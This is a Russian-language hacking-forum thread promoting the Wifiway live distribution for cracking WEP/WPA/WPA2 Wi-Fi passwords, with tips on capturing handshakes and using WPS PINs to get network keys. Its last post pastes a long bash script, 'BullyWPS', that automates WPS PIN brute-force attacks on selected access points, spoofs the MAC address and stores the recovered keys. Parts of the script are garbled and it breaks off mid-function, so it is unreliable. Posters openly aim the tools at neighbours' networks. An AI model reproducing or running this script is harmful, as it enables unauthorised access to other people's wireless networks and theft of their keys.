ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Беспроводные технологии/Wi-Fi/Wardriving (https://forum.antichat.xyz/forumdisplay.php?f=113)
-   -   Wifiway софт для взлома wep wpa wpa2 (https://forum.antichat.xyz/showthread.php?t=295074)

теща 23.09.2011 05:04

С помощью wifiway вы сможете очень быстро получить свой wep пароль

так как там есть утилита FeedingBootle автоматезированая программа

которая уже установлена в этой зборке линукса , так же

автоматически можно поймать Handshake правильно настроив программу

FeedingBootle

wifiway ето инструмент для анализа wi-fi сетей

в нем есть много утилит для анализа вайфай сети

1). В программе есть декодеры паролей роутеров вы их увидите на картинке ниже

http://s39.radikal.ru/i083/1109/72/6c4f6b2820dct.jpg

2). Разные методы атак-подбора wpa wpa2 пароля

http://s16.radikal.ru/i190/1109/e6/a6c2c2c76df0t.jpg

wifiway скачать 607 mb version 2.0.3 iso

Wifiway отличный набор утилит для вардрайвинга ,

даже если человек новичок в теме он может начать с

FeedingBootle - простой утилиты которая поможет взломать wep

за несколько минут (команды не нужно вводить руками) - все на много проще!

Запуск программы : скачиваем записываем образ

как live CD запускаем с дисковода .

Есть другой вариант можно запускать с windows

качаем Oracle VM VirtualBox - и грузим систему с виндовса создав там виртуальный диск, - лично я так и делаю намного быстрее чем live cd не на всех компах работает

Загрузочная флешка - софт usb instaler

Программа не требует установки драйверов под wifi антену ALFA ети драйвера интегрированы в диск .

сборка заточена чтоб сразу работать с анализом wifi

>>
new

wi-fi как поймать wpa2 handshake 2012

penixx 23.09.2011 17:03

да, удобная wifiway

просто клацаешь в меню пуск airmon или airodump

даже команды не надо набирать )))

кстати прекрасно запустилась с помощью Unetbootin прямо с жесткого диска из-под винды

после перезагрузки вход в live

Osstudio 23.09.2011 17:21

Вот эт вещь, у меня как раз 7 Wi-Fi в квартире ловит

Gexik 26.09.2011 00:08

Сколько пакетов нужно собрать для подбора wpa/wpa2? Какой оптимальный размер файла .cap?

теща 26.09.2011 00:13

Цитата:

Сообщение от Gexik

Сколько пакетов нужно собрать для подбора wpa/wpa2? Какой оптимальный размер файла .cap?


тебе сюда http://forum.antichat.ru/thread153326.html ниже есть видео глянь

взлом wep и взлом wpa wpa2 паролей разные вещи

Vert 01.10.2011 22:04

А возможно на торент выложить а то немогу скачать никак ни отсюда ни с официального сайта, скороть до ужаса маленькая 30килобайт(

теща 01.10.2011 22:12

Цитата:

Сообщение от Vert

А возможно на торент выложить а то немогу скачать никак ни отсюда ни с официального сайта, скороть до ужаса маленькая 30килобайт(


проверил у меня скорость закачки на даный момент составляет 400 кбс .. на торент нет возможности выложить . но все нормально!!!!

dupD0M 02.10.2011 02:41

юзанул сборку!

реально хорошая вещь на быструю руку и без всяких загвоздок-все понятно и так же быстро!

спасибо ТС

kosmaty 03.10.2011 11:43

Нууу... Не знаю, мне не понравилось. Во-первых - даже после переключения локализации на инглиш половина программ матерятся по-итальянски, во-вторых, что для меня лично важно - какая-то херь с МС: функциональные клавиши работают только начиная с F6, т.е. ни просмотреть, ни скопировать, ни отредачить файл нельзя, хотя и согласен, что мышку пока никто не отменял, на все же привык с клавиатуры...В-третьих - набор софта для беспроводных сетей морально старый и бесполезный, еслиб не висяки при работе с IPW 2200, то я бы с BT5 не слазил бы вообще.

В общем, сыровата сборочка, однозначно.

теща 04.10.2011 08:17

Цитата:


kosmaty


на щет БТ - ето себе другая ось а ето wifiway он заточен отлично под взлом как веп- что очень просто делается так и под впа впа2 ....

в етой зборке программы сделано все для юзеров в кнопочках так что б они команды не вводили в ручную а работали с программой визуально и мышкой + для поймания хендшейка отлично работает !!! юзаю сам очень просто , то что там пишет по испански логично испанская сборка софта , - я ставил на ру иглиш версии у меня никакихт траблов не было первый раз слышу что таковые есть - я его даже с виртуалки запускал разных причем и все работало...

на щет морально устарел ето ты глубоко ошыбаешся или мало софта видел для взлома

там к примеру есть набор утилит которые подбирают пароль к роутерам у которых пас задан по ,,,год месяц число ,,, --- ;-) ....... мне лень росписовать все так как всем тестировать я описал что стоющая штука а вам решать качать или нет круче етой тузлы я не видел ничего - там правда не весь софт но в моем направление он работает отлично . Если разобраться крутая штука !

angor2005 04.10.2011 15:06

теща, а wifiway - это сборка случаем не твоя? Что-то много сборок развелось.

теща 05.10.2011 08:14

Цитата:

Сообщение от angor2005

теща, а wifiway - это сборка случаем не твоя? Что-то много сборок развелось.

нет .....

да их куча просто нада уметь юзать - ето самая простая

kosmaty 07.10.2011 11:11

Цитата:

Сообщение от теща

Ну, не будем пререкаться, собсна сабж выложен, значит по-любому подлежит обсуждению. Я свое мнение сказал, у кого-то оно может быть другим, это логично. Как-то так..



angor2005 07.10.2011 15:53

Цитата:


сабж выложен, значит по-любому подлежит обсуждению


scaner-vs.ru

Демка работает до 15 дек. 2011, потом новую выложат. Вроде позиционируют, как полный, ну или почти полный автомат. На ютубе имеется видео по взлому WEP и WPA.

http://www.youtube.com/watch?v=HjDSmF3ipfA

http://www.youtube.com/watch?v=pYFClpVZ7D8

acteroid 10.10.2011 13:08

Цитата:

Сообщение от теща

Программа не требует установки драйверов под wifi антену ALFA ети драйвера интегрированы в диск .

сборка заточена чтоб сразу работать с анализом wifi

все работает


Доброго время суток,

У меня USB адаптер Engenius EUB-9703H (802/11n Wireless), Можно в этой программе установить драйвера для данного USB адаптера, что бы USB адаптер при запуске программы тоже работал.

Если можно, то где найти инструкцию по данному вопросу?

Заранее благодарен!

теща 27.10.2011 01:51

Цитата:

Сообщение от acteroid

Доброго время суток,

У меня USB адаптер Engenius EUB-9703H (802/11n Wireless), Можно в этой программе установить драйвера для данного USB адаптера, что бы USB адаптер при запуске программы тоже работал.

Если можно, то где найти инструкцию по данному вопросу?

Заранее благодарен!


если в федингботле не определяет ваш адаптер то по пробуй bt скачать на много проще , ибо с драйверами и установкой постоянно приколы и много вопросов возникает .

4ikotillo 27.10.2011 07:34

Цитата:

Сообщение от acteroid

Доброго время суток,

У меня USB адаптер Engenius EUB-9703H (802/11n Wireless), Можно в этой программе установить драйвера для данного USB адаптера, что бы USB адаптер при запуске программы тоже работал.

Если можно, то где найти инструкцию по данному вопросу?

Заранее благодарен!


Ну что такое? Тут же просто все, берешь ядро системы, запихиваешь в него драйвер от твоей карты(rt2800usb driver), сохраняешь изменения и радуешься жизни.

Чипсет у твоей карты Ralink rt3070, вдруг пригодится при поеске в google.

http://forum.aircrack-ng.org/index.php?topic=9448.0

lanscorrect 10.11.2011 05:59

пацаны, можно ли сломать через юсб адаптер d-link dwa 131??

теща 10.11.2011 06:06

Цитата:

Сообщение от lanscorrect

пацаны, можно ли сломать через юсб адаптер d-link dwa 131??


диск скачай проверь чипсет твой Realtek RTL8192U вроде пригоден .

http://www.wireless-driver.com/dwa-131-wireless-windows-driver-utility/

завтра снесу ........обсуждение адаптеров в другой теме

sloop 12.11.2011 00:47

дайте информацию,как правильно(по пунктам) поставить wiriway на virtual box

pangyndo 26.06.2015 19:36

Можно ссылку где взять???

Vovan71 28.06.2015 18:50

Какая то странная фигня.

Wifislax стоит на HDD.

Inflator и FreedingBootle сошли с ума.

Обе не хотят работать - при переводе карты в Monitor Mode, возвращает сообщение.

Can not into monitor mode!

и все тут.

Причем карта в реальности отрубается от инета.

Все остальные проги и скрипты без исключения работают отлично.

На трех разных адаптерах такое поведение.

Где у них там настройки глянуть? Чего не хватает им для счастья? Переставлять то не хоца :-/

P.S. Загрузился с флешки - все работает. Как бы вылечить на HDD?

vovan54 18.09.2015 15:45

Имею планшет Samsung KE500 T1C адаптер Broadcom 802.11abgn Wireless SDIO Adapter чипсет BCM4330 см.http://www.wireless-driver.com/broadcom-bcm4330-wireless-win7-win8-driver-utility/ . Подскажите каким софтом лучше пользоваться для wardrivinga.

Спасибо.

in062 24.09.2015 23:37

Цитата:

Сообщение от vovan54

Имею планшет Samsung KE500 T1C адаптер Broadcom 802.11abgn Wireless SDIO Adapter чипсет BCM4330 см.http://www.wireless-driver.com/broadcom-bcm4330-wireless-win7-win8-driver-utility/ . Подскажите каким софтом лучше пользоваться для wardrivinga.

Спасибо.


Используй kali 2.0 или backtrack 5 R3 залей на загрузочную флешку и радуйся aircrack-ng там уже есть

Andrey9999 28.09.2015 03:54

ну там, где Clave WPA...: - пароли от точек

Что не так?

Andrey9999 28.09.2015 21:21

Цитата:

Сообщение от power84

Хорошо. А Pin Wps - разве не имя точки?


Нет, имя - "MY_WI-FI", "ficks2008", но кстати зная pin - можно подключиться к точке даже без пароля)...

Andrey9999 29.09.2015 04:46

Цитата:

Сообщение от power84

Спасибо.

А как это сделать, как подключиться без пароля?


http://airslax.net/forum/4-103-1

Хотя у тебя и пароли есть

binarymaster 26.10.2015 10:18

Цитата:

Сообщение от Andrey9999

но кстати зная pin - можно подключиться к точке даже без пароля)...


На самом деле, это просто так звучит.

Взять, например, всем известный WPS клиент JSW/QSS. Он работает по следующему алгоритму:

1. Поиск сетей с WPS

2. Использование пин кода на выбранной точке для получения пароля

3. Добавление нового профиля беспроводной сети в систему (имя сети / шифрование / пароль)

Таким образом, так или иначе, подключение к сети осуществляется по паролю. Другой вопрос, что этот алгоритм незаметен для простого пользователя.

kaliastr2009 29.10.2015 10:06

Цитата:

Сообщение от 5maks5

BullyWPS

http://i.imgur.com/ujgfjeu.png

http://i.imgur.com/AA95Wuu.png

Сделал перевод, поправил несколько функций.

Скачать:

https://www.sendspace.com/file/hy06j3 sendspace

http://notepad.cc/jasmoosi52 source mirror


ссылки битые не могли бы перезалит?

5maks5 10.11.2015 09:30

Цитата:

Сообщение от kaliastr2009

ссылки битые не могли бы перезалит?


Код:

#!/bin/bash

# Global Variables
SCRIPT="BullyWPS"
VERSION="2.1"
KEYS="$HOME/$SCRIPT/KEYS"
TMP="/tmp/$SCRIPT"
WPSPIN="pinWPS"

# Check if the interface is connected to internet
CheckETH() {
clear
if [ "$(ip route|grep default)" != "" ]; then
  ETH=$(ip route|awk '/default/ {print $5}')
  HW_WIFI=$(ifconfig $WIFI|awk '/HW/ {print $5}'|cut -d- -f1,2,3,4,5,6)
  HW_ETH=$(ifconfig $ETH|awk '/HW/ {print $5}'|tr ':' '-')
  if [ "$HW_ETH" = "$HW_WIFI" ];then
    echo
    echo "[0;31mЧтобы избежать ошибок на интерфейсе \"$ETH\" убедитесь, что отключены от интернета! [0m"
    echo ""
    echo "Нажмите enter для возврата в меню."
    read junk
    menu
  fi
fi
}

# Function to select the target to attack
SeleccionarObjetivo() {
i=0
redesWPS=0
while read BSSID Channel RSSI WPSVersion WPSLocked ESSID;do
  longueur=${#BSSID}
  if [ $longueur -eq 17 ] ; then
    i=$(($i+1))
    WPSbssid[$i]=$BSSID
    WPSchanel[$i]=$Channel
    WPSessid[$i]=$ESSID
    PWR[$i]=$RSSI
  fi
  redesWPS=$i
done  [1;36mSelect a network[0m"
  read WPSoption
  set -- ${WPSoption}

  if [ $WPSoption -le $redesWPS ]; then
    if [ "$WPSoption" = "0" ];then
      menu
    fi
    ESSID=${WPSessid[$WPSoption]}
    BSSID=${WPSbssid[$WPSoption]}
    CHANEL=${WPSchanel[$WPSoption]}
    clear
  else
    echo " Выбор не верен ... выберите заново"
    sleep 2
    SeleccionarObjetivo
  fi
fi
ShowWPA="OFF"
InfoAP="ON"
menu
}

# Ищем WPS сети с помощью Wash
WashScan() {
if [ "$WIFI" = "" ]; then auto_select_monitor && WashScan; fi
CheckETH
xterm -icon -e wash -i $WIFI -C -o $TMP/wash_capture.$$ &
WashPID=$!
sec_rem=30
sleep 30 && kill $WashPID &>/dev/null &
while true; do
let sec_rem=$sec_rem-1
        interval=$sec_rem
        seconds=`expr $interval % 60`
        interval=`expr $interval - $seconds`
  sleep 1
  clear
  echo "[1;33mИщем цели... [1;36m$seconds[0m [1;33mseconds[0m"
  echo ""
  cat $TMP/wash_capture.$$
  if [ ! -e /proc/$WashPID ]; then
    sleep 1
    break
  fi
done
SeleccionarObjetivo
}

auto_select_monitor() {
#! /bin/bash

#Переводим карту в режим monitor mode автоматически

clear
t=0
if [ "$WIFI" = "" ]; then
> $TEMP/wireless.txt
cards=`airmon-ng|cut -d ' ' -f 1 | awk {'print $1'} |grep -v Interface #|grep -v  mon  `
echo $cards >> $TEMP/wireless.txt
tarj1=`cat $TEMP/wireless.txt | cut -d  ' ' -f 1  | awk  '{print $1}'`
tarj2=`cat $TEMP/wireless.txt | cut -d  ' ' -f 2  | awk  '{print $1}'`
rm  -rf $TEMP/wireless.txt

if  [ "$tarj1" = "" ]; then
clear
echo "                  * * *    В Н И М А Н И Е  * * *                "
echo ""
echo "    Не найденно ни одной WiFi карточки на этом компьютере"
echo ""
echo "    Нажмите ENTER для возврата в меню"
read yn
menu
fi

if [ "$tarj1" = "$tarj2" ]; then
tarj2=""
fi

tarjselec=$tarj1

if [ "$tarj2" != "" ] ;then
echo
echo
echo "      Следующие WiFi карты найденны на компьютере"
echo

airmon-ng |awk 'BEGIN { print "Карта  Чип              Драйвер\n------- ------------------ ----------" } \
  { printf "%-8s %-8s %-1s %10s\n", $1, $2, $3, $4 | "sort -r"}' |grep -v Interface  |grep -v Chipset

echo "      Выберите одну из карт"
echo

tarj_wire=""
tarjselec=""
function selectarj {
select tarjselec in `airmon-ng | awk {'print $1 | "sort -r"'} |grep -v Interface |grep -v Chipset  `; do
break;
done

if [ "$tarjselec" = "" ]; then
echo "  Выбранные опции неверны."
echo "  Выберите верные опции..."
selectarj
fi
}

if [ "$tarjselec" = "" ]; then
selectarj
fi

echo ""
echo "Выбранный интерфейс: $tarjselec"

fi
else
echo
fi
tarjmonitor=${tarjselec:0:3}
if [ "$tarjmonitor" != "mon" ] && [ "$WIFI" = "" ];then
echo ""
echo ""
echo "                    Переводим карту в режим monitor mode..."
echo ""
sleep 1

#clean interface

ifconfig $tarjselec down >/dev/null
ifconfig $tarjselec up >/dev/null
        ifconfig $tarjselec down
        ifconfig $tarjselec hw ether 00:11:22:33:44:55
        ifconfig $tarjselec up

airmon-ng start $tarjselec >/dev/null
cards=`airmon-ng|cut -d ' ' -f 1 |awk {'print $1 | "sort -d"'} |grep -v Interface |grep -v wlan`
largo=${#cards}
final=$(($largo-4))
WIFI=${cards:final}
echo  " $WIFI ----> Monitor mode включен."
sleep 2

else
if [ "$WIFI" = "" ];then
WIFI="$tarjselec"

echo ""
echo  " $WIFI ----> Monitor mode уже включен."
sleep 2
fi
fi
clear

# Spoof Mac Address and put card into monitor mode
echo -e "Хотите сменить MAC адрес вашей WiFi карты? y/n"

read b
if [[ $b == "Y" || $b == "y" || $b = "" ]]; then
        wmac=00:11:22:33:44:55
        echo
        ifconfig $WIFI down
        macchanger -m 00:11:22:33:44:55 $WIFI
        ifconfig $WIFI up
        echo
        echo
        sleep 3
        else
echo "    Нажмите enter для продолжения."
read c
if [[ $c == "N" || $c == "n" || $c = "" ]]; then
        ifconfig $tarjselec down
        macchanger -p $tarjselec
        ifconfig $tarjselec up
        tput setaf 1; echo "продолжить без смены MAC"
        echo
        echo
        echo
        sleep 2
fi
fi


function ObtenerWPA_con_pin_o_no {
read -p "Ввести PIN вручную? Y/n :" x y

if [[ $x == "Y" || $x == "y" || $x = "" ]]; then
 read -p "pinWPS: " XWPSPIN
 echo ""
 echo ""
 echo ""
xterm -hold -geometry 65x30-1-1 -e bully $WIFI -b $BSSID -c $CHANEL -e $ESSID -p $XWPSPIN -F -B -l 100 -v 3 &
 bullyPID=$!
# If "Control + C" is pressed, the process stops Bully
trap 'kill $BULLY_PID >/dev/null 2>&1' SIGINT
while true; do
  sleep 1
  clear
echo "[+] Атакуем " $BSSID---$ESSID " на канале " $CHANEL " удачного взлома!"
  echo "[1;33mПолучаем WPA...[0m"
  echo ""
  if [ ! -e /proc/$bullyPID ]; then
    sleep 2
    break
  fi
done
echo ""
if [ "$(tail -n 2 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|grep "signal 0$")" ]; then
            PIN="$(tail -n 1 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|tr ':' ' '|awk '{print $2}')"
CLAVE_WPA="$(tail -n 1 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|tr ':' ' '|awk '{print $4}')"
if [ "$WPA_KEY" = "" ]; then
  WPA_TXT="$(echo $ESSID)_$(echo $BSSID|tr ':' '-').txt"
  echo "ESSID: $ESSID" >  $TMP/$WPA_TXT
  echo "PIN WPS: $PIN" >> $TMP/$WPA_TXT
  echo "CLAVE WPA: $CLAVE_WPA" >> $TMP/$WPA_TXT
  cat $TMP/$WPA_TXT|sed -e 's/$/\r/' > $KEYS/$WPA_TXT
  ShowWPA="ON"
  echo "[1;31mКлюч был сохранен in \"$KEYS/$WPA_TXT\"[0m"
fi
fi
clear
echo ""
echo ""
echo ""
wait
else
echo "    Нажмите enter для продолжения."
if [[ $y == "N" || $y == "n" || $y = "" ]]; then
read y
# Attack the Access point

xterm -hold -geometry 65x30-1-1 -e bully $WIFI -b $BSSID -c $CHANEL -e $ESSID -F -l 100 -v 3 &
bullyPID=$!
# If "Control + C" is pressed, the process stops bully
trap 'kill $BULLY_PID >/dev/null 2>&1' SIGINT
while true; do
  sleep 1
  clear
echo "[+] Атакуем " $BSSID---$ESSID " на канале " $CHANEL " удачного взлома!"
  echo "[1;33mПолучаем WPA...[0m"
  echo ""
  if [ ! -e /proc/$bullyPID ]; then
    sleep 2
    break
  fi
done
echo ""
if [ "$(tail -n 2 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|grep "signal 0$")" ]; then
            PIN="$(tail -n 1 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|tr ':' ' '|awk '{print $2}')"
CLAVE_WPA="$(tail -n 1 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|tr ':' ' '|awk '{print $4}')"
if [ "$WPA_KEY" = "" ]; then
  WPA_TXT="$(echo $ESSID)_$(echo $BSSID|tr ':' '-').txt"
  echo "ESSID: $ESSID" >  $TMP/$WPA_TXT
  echo "PIN WPS: $PIN" >> $TMP/$WPA_TXT
  echo "CLAVE WPA: $CLAVE_WPA" >> $TMP/$WPA_TXT
  cat $TMP/$WPA_TXT|sed -e 's/$/\r/' > $KEYS/$WPA_TXT
  ShowWPA="ON"
  echo "[1;31mКлюч был сохранен в \"$KEYS/$WPA_TXT\"[0m"
echo ""
sleep 3
echo ""
echo "    Нажмите enter для продолжения."
read junk
menu
fi
fi
fi
fi
}

function ObtenerWPA {
read -p "Ввести PIN вручную? Y/n :" y

if [[ $y == "Y" || $y == "y" || $y = "" ]]; then
read -p "pinWPS: " yWPSPIN
 echo ""
 echo ""
 echo ""
xterm -hold -geometry 65x30-1-1 -e bully $WIFI -b $BSSID -c $CHANEL -e $ESSID -p $yWPSPIN -F -B -v 3 &
bullyPID=$!
# If "Control + C" is pressed, the process stops bully
trap 'kill $BULLY_PID >/dev/null 2>&1' SIGINT
while true; do
  sleep 1
  clear
echo "[+] Атакуем " $BSSID---$ESSID " на канале " $CHANEL " удачного взлома!"
  echo "[1;33mПолучаем WPA...[0m"
  echo ""
  if [ ! -e /proc/$bullyPID ]; then
    sleep 2
    break
  fi
done
echo ""
if [ "$(tail -n 2 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|grep "signal 0$")" ]; then
            PIN="$(tail -n 1 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|tr ':' ' '|awk '{print $2}')"
CLAVE_WPA="$(tail -n 1 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|tr ':' ' '|awk '{print $4}')"
if [ "$WPA_KEY" = "" ]; then
  WPA_TXT="$(echo $ESSID)_$(echo $BSSID|tr ':' '-').txt"
  echo "ESSID: $ESSID" >  $TMP/$WPA_TXT
  echo "PIN WPS: $PIN" >> $TMP/$WPA_TXT
  echo "CLAVE WPA: $CLAVE_WPA" >> $TMP/$WPA_TXT
  cat $TMP/$WPA_TXT|sed -e 's/$/\r/' > $KEYS/$WPA_TXT
  ShowWPA="ON"
  echo "[1;31mКлюч был сохранен в \"$KEYS/$WPA_TXT\"[0m"
fi
fi
clear
echo ""
echo ""
echo ""
wait
else
echo "    Нажмите Enter для продолжения."
if [[ $e == "N" || $e == "n" || $e = "" ]]; then
read e
# Attack the Access point

xterm -hold -geometry 65x30-1-1 -e bully $WIFI -b $BSSID -c $CHANEL -e $ESSID --force -B -v 3 &
 bullyPID=$!
# If "Control + C" is pressed, the process stops bully
trap 'kill $BULLY_PID >/dev/null 2>&1' SIGINT
while true; do
  sleep 1
  clear
echo "[+] Атакуем " $BSSID---$ESSID " на канале " $CHANEL " удачного взлома!"
  echo "[1;33mПолучаем WPA...[0m"
  echo ""
  if [ ! -e /proc/$bullyPID ]; then
    sleep 2
    break
  fi
done
echo ""
if [ "$(tail -n 2 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|grep "signal 0$")" ]; then
            PIN="$(tail -n 1 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|tr ':' ' '|awk '{print $2}')"
CLAVE_WPA="$(tail -n 1 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|tr ':' ' '|awk '{print $4}')"
if [ "$WPA_KEY" = "" ]; then
  WPA_TXT="$(echo $ESSID)_$(echo $BSSID|tr ':' '-').txt"
  echo "ESSID: $ESSID" >  $TMP/$WPA_TXT
  echo "PIN WPS: $PIN" >> $TMP/$WPA_TXT
  echo "CLAVE WPA: $CLAVE_WPA" >> $TMP/$WPA_TXT
  cat $TMP/$WPA_TXT|sed -e 's/$/\r/' > $KEYS/$WPA_TXT
  ShowWPA="ON"
  echo "[1;31mКлюч был сохранен в \"$KEYS/$WPA_TXT\"[0m"
sleep 3
echo ""
echo "Нажмите enter для возврата в меню"
read junk
menu
fi
fi
fi
fi
}

function Primer_pin {
read -p "YВвести PIN вручную? Y/n :" d

if [[ $d == "Y" || $d == "y" || $d = "" ]]; then
read -p "pinWPS: " dWPSPIN
 echo ""
 echo ""
 echo ""
CheckETH
xterm -hold -geometry 65x30-1-1 -e bully  $WIFI -b $BSSID -c $CHANEL -e $ESSID -p $dWPSPIN -F -B -v 3  &
bullyPID=$!
# If "Control + C" is pressed, the process stops bully
trap 'kill $BULLY_PID >/dev/null 2>&1' SIGINT
while true; do
  sleep 1
  clear
echo "[+] Атакуем " $BSSID---$ESSID " на канале " $CHANEL " удачного взлома!"
  echo "[1;33mПолучаем WPA...[0m"
  echo ""
  if [ ! -e /proc/$bullyPID ]; then
    sleep 2
    break
  fi
done
echo ""
if [ "$(tail -n 2 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|grep "signal 0$")" ]; then
            PIN="$(tail -n 1 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|tr ':' ' '|awk '{print $2}')"
CLAVE_WPA="$(tail -n 1 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|tr ':' ' '|awk '{print $4}')"
if [ "$WPA_KEY" = "" ]; then
  WPA_TXT="$(echo $ESSID)_$(echo $BSSID|tr ':' '-').txt"
  echo "ESSID: $ESSID" >  $TMP/$WPA_TXT
  echo "PIN WPS: $PIN" >> $TMP/$WPA_TXT
  echo "Ключ WPA: $CLAVE_WPA" >> $TMP/$WPA_TXT
  cat $TMP/$WPA_TXT|sed -e 's/$/\r/' > $KEYS/$WPA_TXT
  ShowWPA="ON"
  echo "[1;31mКлюч был сохранен in \"$KEYS/$WPA_TXT\"[0m"
sleep 3
echo ""
echo "    Нажмите enter для продолжения."
read junk
menu
fi
fi
fi
}

#Functional Bully Commands
function optional_functions {
#Set optional functions
bully #to show the options available in terminal
echo "[+] bully $WIFI -b $BSSID -c $CHANEL -e $ESSID"
echo "[+] Enter other functions bully to attack with ex-A-C-D, etc. with spaces"
read bullyVars
#Start
xterm -hold -geometry 65x30-1-1 -e bully $WIFI -b $BSSID -c $CHANEL -e $ESSID $bullyVars &
bullyPID=$!
# If "Control + C" is pressed, the process stops bully
trap 'kill $BULLY_PID >/dev/null 2>&1' SIGINT
while true; do
  sleep 1
  clear
echo "[+] Starting bully (bully $WIFI -b $BSSID -c $CHANEL -e $ESSID $bullyVars)"
echo "[+] Attacking " $BSSID---$ESSID "on channel " $CHANEL " Good Luck and Happy Hacking"
  echo "[1;33mПолучаем WPA...[0m"
  echo ""
  if [ ! -e /proc/$bullyPID ]; then
    sleep 2
    break
  fi
done
echo ""
if [ "$(tail -n 2 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|grep "signal 0$")" ]; then
            PIN="$(tail -n 1 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|tr ':' ' '|awk '{print $2}')"
CLAVE_WPA="$(tail -n 1 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]'|tr -d ':').run"|tr ':' ' '|awk '{print $4}')"
if [ "$WPA_KEY" = "" ]; then
  WPA_TXT="$(echo $ESSID)_$(echo $BSSID|tr ':' '-').txt"
  echo "ESSID: $ESSID" >  $TMP/$WPA_TXT
  echo "PIN WPS: $PIN" >> $TMP/$WPA_TXT
  echo "Key WPA: $CLAVE_WPA" >> $TMP/$WPA_TXT
  cat $TMP/$WPA_TXT|sed -e 's/$/\r/' > $KEYS/$WPA_TXT
  ShowWPA="ON"
  echo "[1;31mКлюч был сохранен in \"$KEYS/$WPA_TXT\"[0m"
sleep 3
echo ""
echo ""
echo "Нажмите enter для возврата в меню."
read junk
menu
fi
fi
}

#Function update Bully
function bully_update {
echo "  "
echo "          [1;32mЭто автоматический установщик обновлений для bully[0m"
echo ""
echo "        [1;36m[Необходим интернет для скачивания пакетов bully][0m"
echo ""
sleep 1
echo "Процедура скачивания последней версии."
sleep 3

# Download the latest Revision with svn
cd /tmp
echo "[1;32m"
svn co http://bully.googlecode.com/svn/trunk/src/ /tmp/bully-read-only && \
echo [0m
cd /tmp/bully-read-only
clear
sleep 2

# Version identification
if [ ! -d ".svn/" ]
then
    echo "0"
    exit ;
fi

REVISION="`svnversion 2> /dev/null | sed 's/[^0-9]*//g'`"

if [ x$REVISION = "x" ]
then
    REVISION="`svn info 2> /dev/null | grep -i revision | sed
's/[^0-9]*//g'`"
fi

if [ x$REVISION = "x" ]
then
    if [ -f ".svn/entries" ]
    then
        REVISION="`cat .svn/entries | grep -i revision | head -n 1 | sed
's/[^0-9]*//g'`"
    fi
fi

if [ x$REVISION = "x" ]
then
    REVISION="-1"
fi

# We report the version
echo ""
echo ""
echo "                      [1;33m>[0m"
sleep 3

# Compile
echo ""
echo ""
echo "[1;33mSe Процедура комплирования пакетов ..."
sleep 3
echo "[1;36m"
make  && \
echo "[0m"
clear
sleep 3

# Installed in system
echo ""
echo ""
echo "[1;35mПроцедура установки пакетов в систему..."
sleep 3
echo ""
echo "[1;33m"
make install && \
echo "[0m"
clear
sleep 3

# Limpiamos
echo ""
echo ""
echo "[1;36mЧищу временные файлы.."
echo ""
sleep 3
rm -Rf /tmp/bully-read-only/trunk/src/ &> /dev/null
rm -Rf $DESTDIR &> /dev/null
sleep 2

# We report the completion of the process
echo ""
echo ""
echo "[1;33mВсе задачи были выполненны! "
echo ""
echo ""
sleep 3
wait

# Press ENTER to return to menu

echo ""
echo "Нажмите enter для возврата в меню."
read yn
menu
}
#Function update macchanger
function macchanger_update {
echo "  "
echo "          [1;32mЭто автоматический установщик обновлений для macchanger[0m"
echo ""
echo "        [1;36m[Необходим интернет для скачивания пакетов macchanger][0m"
echo ""
sleep 1
echo "Процедура скачивания последней версии. "
sleep 3

# Download the latest Revision with svn
cd /tmp
echo "[1;32m"
git clone http://github.com/alobbs/macchanger/ /tmp/macchanger && \
echo [0m
cd /tmp/macchanger
clear
sleep 2
# Cmpile
echo ""
echo ""
echo "[1;33mSe Процедура комплирования пакетов ..."
sleep 3
echo "[1;36m"
bash autogen.sh
echo "[0m"
sleep 3
make  && \
echo "[0m"
clear
sleep 3

# Installed in system
echo ""
echo ""
echo "[1;35mПроцедура установки пакетов в систему..."
sleep 3
echo ""
echo "[1;33m"
make install && \
echo "[0m"
clear
sleep 3

# Clean
echo ""
echo ""
echo "[1;36mЧищу временные файлы.."
echo ""
sleep 3
rm -Rf /tmp/macchanger/ &> /dev/null
sleep 2

# We report the completion of the process
echo ""
echo ""
echo "[1;33mВсе процессы были выполненны! "
echo ""
echo ""
sleep 3
wait

# Press ENTER to return to menu

echo ""
    echo "Нажмите enter для возврата в меню."
read yn
menu
}

#Function card unmount and exit
function DESMONTAR_tarj_y_salir {
if [ "$WIFI" != "" ]; then
clear
echo ""
  echo ""
  echo ""
  echo "    [1;33m####################################################################"
  echo "    [1;33m###                                                              ###"
  echo "    [1;33m###    ¿ Извлечь карту после выхода?                            ###"
  echo "    [1;33m###                                                              ###"
  echo "    [1;33m###        (n) Нет  -> Выйти без извлечения                      ###"
  echo "    [1;33m###        (m) Меню -> Обратно в главное меню                    ###"
  echo "    [1;33m###        ENTER    -> Извлечь и выйти                          ###"
  echo "    [1;33m###      (r)+ENTER -> Восстановит оригинальный MAC              ###"
  echo "    [1;33m###                                                              ###"
  echo "    [1;33m####################################################################"
  echo ""
  echo ""
read salida
set -- ${salida}

if [ "$salida" = "r" ]; then
ifconfig $tarjselec down
macchanger -p $tarjselec
